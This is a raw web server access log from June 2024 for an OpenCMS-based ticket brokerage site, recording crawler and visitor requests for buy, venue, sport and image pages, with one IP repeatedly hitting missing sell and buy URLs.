66.249.75.169 - - [29/Jun/2024:02:44:38 +0200] "GET /ticket2/opencms/nl/buy/?page=1&edid=F1519602-1E42-EA6F-350D-2F5319B545EA HTTP/1.1" 200 109681
192.99.14.159 - - [29/Jun/2024:02:44:39 +0200] "GET /ticket2/opencms/dk/dk/login/?edid=90E4F4A7-FFB8-E63D-BD19-13A2EEA2076B HTTP/1.1" 404 -
185.169.252.159 - - [29/Jun/2024:02:44:39 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=295D0B4F-9C66-266F-5540-9251F65A1527&sortorder=asc&column=price HTTP/1.1" 200 87512
192.99.14.159 - - [29/Jun/2024:02:44:46 +0200] "GET /ticket2/opencms/dk/dk/sell/?edid=1E4491F9-AF0C-74BE-85D7-1954F8C349B8 HTTP/1.1" 404 -
95.163.255.178 - - [29/Jun/2024:02:44:47 +0200] "GET /ticket2/opencms/robots.txt HTTP/1.0" 200 773
192.99.14.159 - - [29/Jun/2024:02:44:50 +0200] "GET /ticket2/opencms/dk/dk/sell/?edid=32BF0609-F2DA-AC01-0A1E-DC0F351CAD89 HTTP/1.1" 404 -
64.62.156.98 - - [29/Jun/2024:02:44:50 +0200] "GET /ticket2/opencms/de/ HTTP/1.1" 200 91946
192.99.14.159 - - [29/Jun/2024:02:44:54 +0200] "GET /ticket2/opencms/dk/dk/sell/?edid=45834EE8-C219-D703-E9BA-9F2A8B0B5D86 HTTP/1.1" 404 -
52.167.144.19 - - [29/Jun/2024:02:44:58 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=60D43F42-D1EF-C1AD-08FA-36635BC6C8AF HTTP/1.1" 200 87468
192.99.14.159 - - [29/Jun/2024:02:45:00 +0200] "GET /ticket2/opencms/dk/dk/sell/?edid=58535046-72BE-3CE1-BB9E-910DEDB611D2 HTTP/1.1" 404 -
47.128.40.13 - - [29/Jun/2024:02:45:00 +0200] "GET /ticket2/opencms/de/buy/?edid=F86B9858-FECA-8B69-0345-5BABEB4E1340 HTTP/1.1" 200 72578
95.163.255.182 - - [29/Jun/2024:02:45:00 +0200] "GET /ticket2/opencms/ru/sport/hockey/nhl/ HTTP/1.1" 500 -
47.128.40.13 - - [29/Jun/2024:02:45:01 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.40.13 - - [29/Jun/2024:02:45:01 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
47.128.40.13 - - [29/Jun/2024:02:45:02 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
47.128.40.13 - - [29/Jun/2024:02:45:02 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
47.128.40.13 - - [29/Jun/2024:02:45:02 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
47.128.40.13 - - [29/Jun/2024:02:45:02 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
47.128.40.13 - - [29/Jun/2024:02:45:02 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
192.99.14.159 - - [29/Jun/2024:02:45:04 +0200] "GET /ticket2/opencms/dk/dk/sell/?edid=58D2379F-0C7D-214F-62E1-D9376EBE1BC7 HTTP/1.1" 404 -
192.99.14.159 - - [29/Jun/2024:02:45:09 +0200] "GET /ticket2/opencms/dk/dk/sell/?edid=6EA9C6C1-4A98-9DDB-09DD-280525870AC5 HTTP/1.1" 404 -
192.99.14.159 - - [29/Jun/2024:02:45:13 +0200] "GET /ticket2/opencms/dk/dk/sell/?edid=7620AC05-C07D-20B0-5C26-2BB0AB225757 HTTP/1.1" 404 -
37.60.238.15 - - [29/Jun/2024:02:45:15 +0200] "GET /ticket2/opencms/de/fi/venue/?venueid=73970756-584C-5AD0-AF0B-3AFA065A2530 HTTP/1.1" 404 -
192.99.14.159 - - [29/Jun/2024:02:45:18 +0200] "GET /ticket2/opencms/dk/dk/sell/?edid=87290264-453D-FFD4-E0AD-C907B793DD48 HTTP/1.1" 404 -
192.99.14.159 - - [29/Jun/2024:02:45:24 +0200] "GET /ticket2/opencms/dk/dk/sell/?edid=90E4F4A7-FFB8-E63D-BD19-13A2EEA2076B HTTP/1.1" 404 -
185.191.171.19 - - [29/Jun/2024:02:45:28 +0200] "GET /ticket2/opencms/fi/urheilu/jalkapallo/serie_a/atalanta/ HTTP/1.1" 200 74338
47.128.21.145 - - [29/Jun/2024:02:45:28 +0200] "GET /ticket2/opencms/fi/venue/?venueid=2F862179-0B10-FC34-DC0F-3A7D917FB335 HTTP/1.1" 200 72920
192.99.14.159 - - [29/Jun/2024:02:45:28 +0200] "GET /ticket2/opencms/dk/dk/sell/?edid=9261FAEC-63AE-50D4-BB76-C4DEAD54BAED HTTP/1.1" 404 -
47.128.21.145 - - [29/Jun/2024:02:45:29 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.21.145 - - [29/Jun/2024:02:45:29 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
85.208.96.212 - - [29/Jun/2024:02:45:30 +0200] "GET /ticket2/opencms/fi/login HTTP/1.1" 200 75191
47.128.21.145 - - [29/Jun/2024:02:45:30 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
47.128.21.145 - - [29/Jun/2024:02:45:30 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
47.128.21.145 - - [29/Jun/2024:02:45:30 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
47.128.21.145 - - [29/Jun/2024:02:45:30 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
47.128.21.145 - - [29/Jun/2024:02:45:30 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
192.99.14.159 - - [29/Jun/2024:02:45:32 +0200] "GET /ticket2/opencms/dk/dk/sell/?edid=957914D1-52DE-8F66-FE37-052551257944 HTTP/1.1" 404 -
192.99.14.159 - - [29/Jun/2024:02:45:36 +0200] "GET /ticket2/opencms/dk/dk/sell/?edid=9AFE2803-9D25-C6E6-8BD9-C9F1130FF6D1 HTTP/1.1" 404 -
192.99.14.159 - - [29/Jun/2024:02:45:40 +0200] "GET /ticket2/opencms/dk/dk/sell/?edid=F0CAACE5-4386-0E1D-731D-CAAAD092C7DB HTTP/1.1" 404 -
192.99.14.159 - - [29/Jun/2024:02:45:47 +0200] "GET /ticket2/opencms/dk/dk/sell/?edid=1E4491F9-AF0C-74BE-85D7-1954F8C349B8 HTTP/1.1" 404 -
192.99.14.159 - - [29/Jun/2024:02:45:52 +0200] "GET /ticket2/opencms/dk/dk/sell/?edid=1EF4E706-5097-0A86-8C15-17846FC7046D HTTP/1.1" 404 -
216.245.221.83 - - [29/Jun/2024:02:45:56 +0200] "HEAD /ticket2/opencms/ HTTP/1.1" 302 -
216.245.221.83 - - [29/Jun/2024:02:45:59 +0200] "HEAD /ticket2/opencms/en/ HTTP/1.1" 200 -
192.99.14.159 - - [29/Jun/2024:02:45:59 +0200] "GET /ticket2/opencms/dk/dk/sell/?edid=32BF0609-F2DA-AC01-0A1E-DC0F351CAD89 HTTP/1.1" 404 -
37.60.238.15 - - [29/Jun/2024:02:46:00 +0200] "GET /ticket2/opencms/de/fi/venue/?venueid=73D30778-E729-2B5E-6F67-7A83775E811A HTTP/1.1" 404 -
192.99.14.159 - - [29/Jun/2024:02:46:05 +0200] "GET /ticket2/opencms/dk/dk/sell/?edid=58535046-72BE-3CE1-BB9E-910DEDB611D2 HTTP/1.1" 404 -
185.191.171.1 - - [29/Jun/2024:02:46:10 +0200] "GET /ticket2/opencms/sv/magazine/article?title=tottenham-hotspur-fc HTTP/1.1" 200 76942
192.99.14.159 - - [29/Jun/2024:02:46:13 +0200] "GET /ticket2/opencms/dk/dk/sell/?edid=58D2379F-0C7D-214F-62E1-D9376EBE1BC7 HTTP/1.1" 404 -
192.99.14.159 - - [29/Jun/2024:02:46:22 +0200] "GET /ticket2/opencms/dk/dk/sell/?edid=6EA9C6C1-4A98-9DDB-09DD-280525870AC5 HTTP/1.1" 404 -
47.128.38.249 - - [29/Jun/2024:02:46:24 +0200] "GET /ticket2/opencms/fi/venue/?venueid=004352C5-E3C9-4789-9D05-F691F3C15650 HTTP/1.1" 200 72933
47.128.38.249 - - [29/Jun/2024:02:46:24 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.38.249 - - [29/Jun/2024:02:46:25 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
47.128.38.249 - - [29/Jun/2024:02:46:25 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
47.128.38.249 - - [29/Jun/2024:02:46:25 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
47.128.38.249 - - [29/Jun/2024:02:46:25 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
47.128.38.249 - - [29/Jun/2024:02:46:26 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
47.128.38.249 - - [29/Jun/2024:02:46:26 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
192.99.14.159 - - [29/Jun/2024:02:46:28 +0200] "GET /ticket2/opencms/dk/dk/sell/?edid=7620AC05-C07D-20B0-5C26-2BB0AB225757 HTTP/1.1" 404 -
192.99.14.159 - - [29/Jun/2024:02:46:34 +0200] "GET /ticket2/opencms/dk/dk/sell/?edid=87290264-453D-FFD4-E0AD-C907B793DD48 HTTP/1.1" 404 -
66.249.75.167 - - [29/Jun/2024:02:46:39 +0200] "GET /ticket2/opencms/sv/konsertbiljetter/eminem/ HTTP/1.1" 200 73931
192.99.14.159 - - [29/Jun/2024:02:46:43 +0200] "GET /ticket2/opencms/dk/dk/sell/?edid=90E4F4A7-FFB8-E63D-BD19-13A2EEA2076B HTTP/1.1" 404 -
40.77.167.56 - - [29/Jun/2024:02:46:46 +0200] "GET /ticket2/opencms/fr/buy?page=1&edid=6B1BC3D5-41D5-1130-8508-F118D3CA5AB9 HTTP/1.1" 200 115427
37.60.238.15 - - [29/Jun/2024:02:46:47 +0200] "GET /ticket2/opencms/de/fi/venue/?venueid=73F2F83F-35FC-D320-77FF-C349F98B1063 HTTP/1.1" 404 -
192.99.14.159 - - [29/Jun/2024:02:46:50 +0200] "GET /ticket2/opencms/dk/dk/sell/?edid=9261FAEC-63AE-50D4-BB76-C4DEAD54BAED HTTP/1.1" 404 -
216.244.66.196 - - [29/Jun/2024:02:46:53 +0200] "GET /ticket2/opencms/robots.txt HTTP/1.1" 200 773
192.99.14.159 - - [29/Jun/2024:02:46:57 +0200] "GET /ticket2/opencms/dk/dk/sell/?edid=957914D1-52DE-8F66-FE37-052551257944 HTTP/1.1" 404 -
192.99.14.159 - - [29/Jun/2024:02:47:05 +0200] "GET /ticket2/opencms/dk/dk/sell/?edid=9AFE2803-9D25-C6E6-8BD9-C9F1130FF6D1 HTTP/1.1" 404 -
192.99.14.159 - - [29/Jun/2024:02:47:11 +0200] "GET /ticket2/opencms/dk/dk/sell/?edid=F0CAACE5-4386-0E1D-731D-CAAAD092C7DB HTTP/1.1" 404 -
47.128.55.186 - - [29/Jun/2024:02:47:18 +0200] "GET /ticket2/opencms/fr/buy/?edid=AC0B9D95-EFDF-620F-1AF4-978A4B3BD208 HTTP/1.1" 200 72687
192.99.14.159 - - [29/Jun/2024:02:47:19 +0200] "GET /ticket2/opencms/dk/dk/sport/fodboldbilletter/la-liga/las_palmas/ HTTP/1.1" 404 -
47.128.55.186 - - [29/Jun/2024:02:47:19 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.55.186 - - [29/Jun/2024:02:47:19 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
47.128.55.186 - - [29/Jun/2024:02:47:20 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
47.128.55.186 - - [29/Jun/2024:02:47:20 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
47.128.55.186 - - [29/Jun/2024:02:47:20 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
47.128.55.186 - - [29/Jun/2024:02:47:20 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
47.128.55.186 - - [29/Jun/2024:02:47:20 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
95.163.255.196 - - [29/Jun/2024:02:47:21 +0200] "GET /ticket2/opencms/sv/sport/fotbollsbiljetter/ HTTP/1.1" 200 77181
47.128.115.201 - - [29/Jun/2024:02:47:21 +0200] "GET /ticket2/opencms/fi/venue/?venueid=04FE23B3-F967-A980-5AB7-9F3B7C91A15B HTTP/1.1" 200 72927
47.128.115.201 - - [29/Jun/2024:02:47:22 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/jquery/jquery.js HTTP/1.1" 200 93868
47.128.115.201 - - [29/Jun/2024:02:47:22 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.115.201 - - [29/Jun/2024:02:47:22 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
47.128.115.201 - - [29/Jun/2024:02:47:23 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
47.128.115.201 - - [29/Jun/2024:02:47:23 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
205.210.31.235 - - [29/Jun/2024:02:47:23 +0200] "GET / HTTP/1.1" 404 -
47.128.115.201 - - [29/Jun/2024:02:47:23 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
47.128.115.201 - - [29/Jun/2024:02:47:23 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
47.128.115.201 - - [29/Jun/2024:02:47:23 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
192.99.14.159 - - [29/Jun/2024:02:47:27 +0200] "GET /ticket2/opencms/dk/dk/sport/fodboldbilletter/la-liga/malaga/ HTTP/1.1" 404 -
20.112.85.242 - - [29/Jun/2024:02:47:36 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
192.99.14.159 - - [29/Jun/2024:02:47:37 +0200] "GET /ticket2/opencms/dk/dk/sport/fodboldbilletter/la-liga/real_betis/ HTTP/1.1" 404 -
216.245.221.83 - - [29/Jun/2024:02:47:39 +0200] "HEAD /ticket2/opencms/ HTTP/1.1" 302 -
216.245.221.83 - - [29/Jun/2024:02:47:39 +0200] "HEAD /ticket2/opencms/en/ HTTP/1.1" 200 -
66.249.75.107 - - [29/Jun/2024:02:47:42 +0200] "GET /ticket2/opencms/en/venue/?venueid=3AE26EE0-A3E4-AABA-2528-19D13CD1D081 HTTP/1.1" 200 71383
192.99.14.159 - - [29/Jun/2024:02:47:47 +0200] "GET /ticket2/opencms/dk/dk/sport/fodboldbilletter/la-liga/real_madrid/ HTTP/1.1" 404 -
37.60.238.15 - - [29/Jun/2024:02:47:49 +0200] "GET /ticket2/opencms/de/fi/venue/?venueid=7459A29D-3F4C-884C-C85C-9368023CDEDD HTTP/1.1" 404 -
192.99.14.159 - - [29/Jun/2024:02:47:53 +0200] "GET /ticket2/opencms/dk/dk/sport/fodboldbilletter/la-liga/sevilla/ HTTP/1.1" 404 -
192.99.14.159 - - [29/Jun/2024:02:48:00 +0200] "GET /ticket2/opencms/dk/dk/sport/fodboldbilletter/la-liga/villarreal/ HTTP/1.1" 404 -
192.99.14.159 - - [29/Jun/2024:02:48:05 +0200] "GET /ticket2/opencms/dk/en/buy/?comcatid=66708183-7480-3365-06BF-DBF60280AB45 HTTP/1.1" 404 -
192.99.14.159 - - [29/Jun/2024:02:48:09 +0200] "GET /ticket2/opencms/dk/en/buy/?comcatid=810BB404-4103-77F2-A6C2-12D5E6C338E2 HTTP/1.1" 404 -
192.99.14.159 - - [29/Jun/2024:02:48:14 +0200] "GET /ticket2/opencms/dk/en/buy/?comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=E92E6B1B-7CD1-74B1-312C-265A7D8125D0 HTTP/1.1" 404 -
47.128.38.79 - - [29/Jun/2024:02:48:16 +0200] "GET /ticket2/opencms/nl/buy/?catid=08F27F2A-1872-A39F-A97C-63093E77B18A&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E HTTP/1.1" 200 81245
47.128.38.79 - - [29/Jun/2024:02:48:16 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.38.79 - - [29/Jun/2024:02:48:17 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
47.128.38.79 - - [29/Jun/2024:02:48:17 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
47.128.38.79 - - [29/Jun/2024:02:48:17 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
47.128.38.79 - - [29/Jun/2024:02:48:18 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
47.128.38.79 - - [29/Jun/2024:02:48:18 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
47.128.38.79 - - [29/Jun/2024:02:48:18 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
192.99.14.159 - - [29/Jun/2024:02:48:18 +0200] "GET /ticket2/opencms/dk/en/buy/?comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=F03B8ADD-988E-AE6A-8DBA-AF502C691C60 HTTP/1.1" 404 -
85.208.96.212 - - [29/Jun/2024:02:48:21 +0200] "GET /ticket2/opencms/sv/sport/fotbollsbiljetter/fa_cup/ HTTP/1.1" 200 74987
192.99.14.159 - - [29/Jun/2024:02:48:24 +0200] "GET /ticket2/opencms/dk/en/buy/?comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=FF8D7FE7-4B09-7305-01C7-2D47F7913EB8 HTTP/1.1" 404 -
192.99.14.159 - - [29/Jun/2024:02:48:29 +0200] "GET /ticket2/opencms/dk/en/buy/?comcatid=B41CCF2B-5558-7AEE-3602-09BBDE417D65 HTTP/1.1" 404 -
192.99.14.159 - - [29/Jun/2024:02:48:33 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=008C81A9-188D-8C15-F03E-F7BB412D5D0F&sortorder=asc&column=section HTTP/1.1" 404 -
192.99.14.159 - - [29/Jun/2024:02:48:38 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=01148208-C5C5-644D-6BB7-97FA6BDD0B48&sortorder=asc&column=price HTTP/1.1" 404 -
185.169.252.159 - - [29/Jun/2024:02:48:40 +0200] "GET /ticket2/opencms/sv/buy/?page=1&edid=295D0B4F-9C66-266F-5540-9251F65A1527&sortorder=asc&column=row HTTP/1.1" 200 87512
192.99.14.159 - - [29/Jun/2024:02:48:45 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=01148208-C5C5-644D-6BB7-97FA6BDD0B48&sortorder=asc&column=row HTTP/1.1" 404 -
114.119.137.43 - - [29/Jun/2024:02:48:48 +0200] "GET /ticket2/opencms/en/buy/?page=1&edid=5CB5BC3B-01E7-EA64-D21B-AC03FD11E181 HTTP/1.1" 200 86778
192.99.14.159 - - [29/Jun/2024:02:48:49 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=017877D6-AD6D-7619-CD21-72EA53A1F341&sortorder=asc&column=section HTTP/1.1" 404 -
37.60.238.15 - - [29/Jun/2024:02:48:52 +0200] "GET /ticket2/opencms/de/fi/venue/?venueid=746CCE1D-277E-E4D6-B842-3BD4A3960F1B HTTP/1.1" 404 -
192.99.14.159 - - [29/Jun/2024:02:48:56 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=03FD16C4-0EC2-DC3A-3BB6-8FFAB35CE604&sortorder=asc&column=row HTTP/1.1" 404 -
185.191.171.18 - - [29/Jun/2024:02:48:57 +0200] "GET /ticket2/opencms/fi/urheilu/jalkapallo/la-liga/rayo_vallecano/ HTTP/1.1" 200 74668
192.99.14.159 - - [29/Jun/2024:02:49:00 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=0402FC40-F678-C9EA-3CF1-F40BA80359DC&sortorder=asc&column=row HTTP/1.1" 404 -
52.167.144.176 - - [29/Jun/2024:02:49:01 +0200] "GET /ticket2/opencms/en/venue/?countryid=431EFD4E-08D9-96D2-1220-D823702A8178 HTTP/1.1" 200 100730
192.99.14.159 - - [29/Jun/2024:02:49:04 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=04B33386-1D6A-271D-1E77-1D44685B200A&sortorder=asc&column=row HTTP/1.1" 404 -
192.99.14.159 - - [29/Jun/2024:02:49:08 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=04B33386-1D6A-271D-1E77-1D44685B200A&sortorder=asc&column=section HTTP/1.1" 404 -
192.99.14.159 - - [29/Jun/2024:02:49:12 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=050CB67E-35BA-437D-E1E2-B5E18B72F0DE&sortorder=asc&column=row HTTP/1.1" 404 -
47.128.58.189 - - [29/Jun/2024:02:49:13 +0200] "GET /ticket2/opencms/fi/venue/?venueid=6F62E299-6764-CD18-03A7-BC347C9C568D HTTP/1.1" 200 72882
47.128.58.189 - - [29/Jun/2024:02:49:14 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.58.189 - - [29/Jun/2024:02:49:14 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
47.128.58.189 - - [29/Jun/2024:02:49:15 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
47.128.58.189 - - [29/Jun/2024:02:49:15 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
47.128.58.189 - - [29/Jun/2024:02:49:15 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
47.128.58.189 - - [29/Jun/2024:02:49:15 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
47.128.58.189 - - [29/Jun/2024:02:49:15 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
192.99.14.159 - - [29/Jun/2024:02:49:16 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=050CB67E-35BA-437D-E1E2-B5E18B72F0DE&sortorder=asc&column=section HTTP/1.1" 404 -
40.77.167.241 - - [29/Jun/2024:02:49:22 +0200] "GET /ticket2/opencms/dk/venue/?venueid=D9D29041-8F09-AC24-29B9-BAE0DD9106BB HTTP/1.1" 200 71831
192.99.14.159 - - [29/Jun/2024:02:49:23 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=050CB67E-35BA-437D-E1E2-B5E18B72F0DE&sortorder=desc&column=row HTTP/1.1" 404 -
192.99.14.159 - - [29/Jun/2024:02:49:27 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=050CB67E-35BA-437D-E1E2-B5E18B72F0DE&sortorder=desc&column=section HTTP/1.1" 404 -
192.99.14.159 - - [29/Jun/2024:02:49:30 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=054983DD-B81A-7D3F-365C-83D4087186D5&sortorder=asc&column=price HTTP/1.1" 404 -
192.99.14.159 - - [29/Jun/2024:02:49:35 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=054983DD-B81A-7D3F-365C-83D4087186D5&sortorder=asc&column=row HTTP/1.1" 404 -
114.119.135.169 - - [29/Jun/2024:02:49:36 +0200] "GET /ticket2/opencms/en/buy/?page=1&edid=84489EF5-2059-56C4-5351-326D2C1716FB HTTP/1.1" 200 86719
47.128.55.154 - - [29/Jun/2024:02:49:36 +0200] "GET /ticket2/opencms/fr/buy/?edid=F2D85B77-0146-9383-AAB8-AFEF60C3B51B HTTP/1.1" 200 72687
47.128.55.154 - - [29/Jun/2024:02:49:36 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
47.128.55.154 - - [29/Jun/2024:02:49:37 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
47.128.55.154 - - [29/Jun/2024:02:49:37 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
47.128.55.154 - - [29/Jun/2024:02:49:37 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
47.128.55.154 - - [29/Jun/2024:02:49:37 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
47.128.55.154 - - [29/Jun/2024:02:49:37 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
47.128.55.154 - - [29/Jun/2024:02:49:37 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
192.99.14.159 - - [29/Jun/2024:02:49:39 +0200] "GET /ticket2/opencms/dk/en/buy/?page=1&edid=05BDF663-CBF6-7C6A-275B-0A0C7AEDB74E&sortorder=asc&column=section HTTP/1.1" 404 -
66.249.76.8 - - [29/Jun/2024:02:49:44 +0200] "GET /ticket2/opencms/en/venue/?venueid=F99CBBAF-7922-5F3D-94E5-84437A50F751 HTTP/1.1" 200 71315
37.60.238.15 - - [29/Jun/2024:02:49:45 +0200] "GET /ticket2/opencms/de/fi/venue/?venueid=74835483-DDAC-3DE1-0EB1-B44B58F2B260 HTTP/1.1" 404 -
